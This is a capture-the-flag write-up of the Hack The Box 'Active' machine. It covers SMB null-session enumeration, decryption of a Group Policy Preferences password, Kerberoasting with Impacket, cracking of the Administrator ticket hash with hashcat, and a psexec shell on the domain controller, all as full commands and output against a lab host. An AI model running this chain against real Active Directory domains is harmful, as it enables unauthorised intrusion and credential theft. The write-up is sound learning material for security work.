Active is an easy difficulty box. We enumerate SMB shares using null authentication to locate a Groups.xml file. This file contains Group Policy Preferences (GPP) credentials, which we leverage to perform a Kerberoasting attack.
Reconnaissance
Nmap
Scanning for all TCP ports using a default set of scripts (-sC) and version detection (-sV).
- We have access to a DNS port. We should try a DNS zone transfer.
- It is most likely an old Windows Server 2008 R2 SP1.
- Port 88 is open; we are dealing with a domain controller.
- We can enumerate the domain active.htb using SMB and LDAP.
┌──(iwo㉿kali)-[~/boxes/active/scans]
└─$ nmap -sCV -p- 10.10.10.100 -oA tcp_sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 03:14 CET
Nmap scan report for 10.10.10.100
Host is up (0.067s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-23 02:17:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-23T02:18:30
|_ start_date: 2025-01-23T02:02:18
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.44 secondsDNS - UDP/TCP 53
We get back a response to a DNS query.
┌──(iwo㉿kali)-[~/boxes/active/scans]
└─$ dig 10.10.10.100 active.htb
; <<>> DiG 9.20.4-3-Debian <<>> 10.10.10.100 active.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11559
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;10.10.10.100. IN A
;; ANSWER SECTION:
10.10.10.100. 5 IN A 10.10.10.100
;; Query time: 3 msec
;; SERVER: 172.16.195.2#53(172.16.195.2) (UDP)
;; WHEN: Thu Jan 23 03:29:18 CET 2025
;; MSG SIZE rcvd: 46
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 43990
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 1280
; COOKIE: 83dec5c0f075595b010000006791a97e5c66cd42d07379e9 (good)
;; QUESTION SECTION:
;active.htb. IN A
;; AUTHORITY SECTION:
. 5 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025012201 1800 900 604800 86400
;; Query time: 23 msec
;; SERVER: 172.16.195.2#53(172.16.195.2) (UDP)
;; WHEN: Thu Jan 23 03:29:18 CET 2025
;; MSG SIZE rcvd: 142Unfortunately, performing a DNS zone transfer fails.
┌──(iwo㉿kali)-[~/boxes/active/scans]
└─$ dig AXFR @10.10.10.100 active.htb
; <<>> DiG 9.20.4-3-Debian <<>> AXFR @10.10.10.100 active.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.SMB - TCP 445
SMB allows null authentication. I have read privileges over the Replication share.
┌──(iwo㉿kali)-[~/boxes/active/scans]
└─$ smbclient -N -L \\10.10.10.100
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableDownloading everything from the Replication share.
smb: \active.htb\> mask ""
smb: \active.htb\> recurse ON
smb: \active.htb\> prompt OFF
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.5 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (13.0 KiloBytes/sec) (average 3.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (2.5 KiloBytes/sec) (average 3.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.8 KiloBytes/sec) (average 3.3 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (17.6 KiloBytes/sec) (average 5.2 KiloBytes/sec)
smb: \active.htb\> exit
┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ tree
.
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
22 directories, 7 filesThe password is AES-256 bit encrypted. However, it is not an issue as Microsoft published the AES private key on MSDN which can be used to decrypt the password. We will use the gpp-decrypt to decrypt the password for the SVC_TGS user.
┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ cat Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18We can retrieve the password policy, Kerberos settings and a registry value saying that LM hashes are not allowed. Notice that we don’t have to worry about lockouts.
┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ cat Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Microsoft/Windows\ NT/SecEdit/GptTmpl.inf
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Version]
signature="$CHICAGO$"
Revision=1We retrieved a list of privilege rights assigned to various SIDs. Not really interesting in our case. Let’s look what we can achieve with newly acquired credentials.
┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ cat Policies/\{6AC1786C-016F-11D2-945F-00C04fB984F9\}/MACHINE/Microsoft/Windows\ NT/SecEdit/GptTmpl.inf
[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1We can access 3 more shares using credentials SVC_TGS:GPPstillStandingStrong2k18.
┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
[*] Closed 1 connectionWe continue to extract files from the SMB shares.
┌──(iwo㉿kali)-[~/boxes/active/smb/SVC_TGS]
└─$ smbclient -U active.htb/SVC_TGS --password=GPPstillStandingStrong2k18 \\\\10.10.10.100\\Users
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHSrn 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHSrn 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
5217023 blocks of size 4096. 278842 blocks available
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
<SNIP>┌──(iwo㉿kali)-[~/boxes/active/smb/SVC_TGS]
└─$ smbclient -U active.htb/SVC_TGS --password=GPPstillStandingStrong2k18 \\\\10.10.10.100\\SYSVOL
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
<SNIP>We retrieve the user flag from those files!
┌──(iwo㉿kali)-[~/boxes/active/smb/SVC_TGS]
└─$ cat SVC_TGS/Desktop/user.txt
c37c0a**************************Privilege escalation
Kerberoasting
We have a set of valid credentials that we can use to request Kerberos TGS tickets. Let’s perform a Kerberoasting attack.
┌──(iwo㉿kali)-[~/boxes/active/hashes]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2025-01-23 03:03:26.780555
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$603d7ffa425cafd14449856a8ed749ba$a79688df7f2241902f1f03dc9de298b48fd112a1fe1317347218d06af1b1ea1b42d1a46ee55839d67641b8157f50d66014c24a0bfae32f0d4a0a2a21f54bdbb1e6c274cfd8a97c86f9dec9c4cd19880889636722ec3b4e2e97090adf4792cf14c733d36085a14295c5e3059eaa43731b66762c2425748510c96bb090aab6be81facd70992a2754b29465ebb7bb7bbf592cbe5a286056defd57bdfaa4432f702c9b69cb288f90480b1df5278369a87a7aa44f38b23a3f9c7a594c513d69f68d7acf83a3386a37c7e72c0f983021669cde32db8c1bd6c9bf550921308dcbf935f58ecd52d0f5a41ce10a51bd0e99b6962f50ae60eb98b84f3f5de2e62673e22fed8f3c78d1a893c49ff167f9b8d8f71495ca41a9c572383ad25b2e5f675dad4e5c58cf4be4786d8821e4cd54d6dde888ea55cc564a20e0238b69ab830e4257db4bca358d93e61dad85afa6105b3ba9b80e84b29bbab9a649b816a05b2f31f1c00182d8d18374734b8e4aaf063b54fc661a78f382f467f4bcc3ee91632262b68953de94de99fed12c8d661b717efd91949cd99b1b6ee821e9792d5258506382c3b755556b535ad4222d1a5391283a55ade45c36065ee3b42fcd56539119490da7eb48cb79005a589af86d34499ee445128589015845d0fbfc442378b31b9a9081f7779a6a8a1c4d2d9ef02dfd98022a4d85798666a5b49824f1b51c640ee3b66d6e570c9e743a1324d36efd600720cdd13a4987606c517623ba2be15af270b731e8b08e6fc6313596242316be4d31692e18a2d38d8a2aa9b9ac8a707208a47935ce20512c4e78feb90c3d47bddd0c795db9e4d6bd9352157239364bc8844b007644a4f77dd6fe65b92f0e8eeae819f89c7861527a605501f1c937fc0fbcb1d67e4b1d4b51a655c1bd75592d6574128618a2fa1f3d44470aa703ffad05cf5f9d63bfa7b3ecd85252d8d1ec7a9729de8a5bdc466bba5a2330956c2740367a47f1c810c97bb1126640363b6859cf5726e125dfed136f55a6c3e514674c6ba21487a31912f1028d21717e4bbe260560417b7abad4fd934edd28db2b8a1289e5503fc1e75df96c64279d7b9f2643afd667bf3f9f04362c896f2cb13e5c3294e8bb6f09d85fe937d94b49dd4ffb2de74d9c7cc40fb838541360db1a791e019d040922e89e3801b37a71f98330dd38f32a2ec0159fac03de9c73bf2574abaa5602c871f1f0f736bdc447cbb4b4c8749d9c5b84be07a14b9aa2537e12d5d9f7Cracking a hash
We successfully crack the Administrator’s hash.
┌──(iwo㉿kali)-[~/boxes/active/hashes]
└─$ hashcat -a 0 -m 13100 administrator.hash /usr/share/wordlists/rockyou.txt
<SNIP>
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9
184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed089e1c91c513b7c98149af2f9a
994655f5f13559e0acb003519ce89fa32a1dd1c8c7a24636c48a5c948317feb38abe54f875ffe259b6b25a63007798174e564f0d6a09479de92e6ed98f0887e19b1069b30e2ed8005bb8601faf4e476672865310c6a0ea0b
ea1ae10caff51715aea15a38fb2c1461310d99d6916445d7254f232e78cf9288231e436ab457929f50e6d4f70cbfcfd2251272961ff422c3928b0d702dcb31edeafd856334b64f74bbe486241d752e4cf2f6160b718b87aa
7c7161e95fab757005e5c80254a71d8615f4e89b0f4bd51575cc370e881a570f6e5b71dd14f50b8fd574a04978039e6f32d108fb4207d5540b4e58df5b8a0a9e36ec2d7fc1150bb41eb9244d96aaefb36055ebcdf435a42d
937dd86b179034754d2ac4db28a177297eaeeb86c229d0f121cf04b0ce32f63dbaa0bc5eafd47bb97c7b3a14980597a9cb2d83ce7c40e1b864c3b3a77539dd78ad41aceb950a421a707269f5ac25b27d5a6b7f334d37acc7
532451b55ded3fb46a4571ac27fc36cfad031675a85e0055d31ed154d1f273e18be7f7bc0c810f27e9e7951ccc48d976f7fa66309355422124ce6fda42f9df406563bc4c20d9005ba0ea93fac71891132113a15482f3d952
d54f22840b7a0a6000c8e8137e04a898a4fd1d87739bf5428d748086f0166b35c181729cc62b41ba6a9157333bb77c9e03dc9ac23782cf5dcebd11faad8ca3e3e74e25f21dc04ba9f1703bd51d100051c8f505cc8085056b
94e349b57906ee8deaf026b3daa89e7c3fc747a6a31ae08376da259f3118370bef86b6e7c2f88d66400eccb122dec8028223f6dcde29ffaa5b83ecb1c3780a782a5797c527a26a7b51b62db3e4865ebc2a0a0d2c931550de
cb3e7ae581b59f070dd33e423a90ec2ef66982a1b6336afe968fa93f5dd2880a313dc05d4e5cf104b6d9a8316b9fe3dc16e057e0f5c835e111ab92795fb0033541916a57df8f8e6b8cc25ecff2775282ccee110c49376c2c
ec6b7bb95c265f1466994da89e69605594ead28d24212a137ee20197d8aa95f243c347e02616f40f4071c33f749f5b94d1259fd32174:Ticketmaster1968Getting a shell
We utilize the psexec.py script from Impacket toolkit, enabling us to get the root flag.
┌──(iwo㉿kali)-[~/boxes/active/hashes]
└─$ psexec.py active.htb/administrator@10.10.10.100
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file zohPLsud.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service tdxm on 10.10.10.100.....
[*] Starting service tdxm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
822711**************************Alternatively, we can avoid getting a shell and retrieve the root flag using the smbclient.
┌──(iwo㉿kali)-[~/boxes/active/hashes]
└─$ smbclient -U active.htb/administrator --password=Ticketmaster1968 \\\\10.10.10.100\\C$
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)We now possess the highest level of privileges and have successfully compromised the entire Active Directory (AD) domain. :D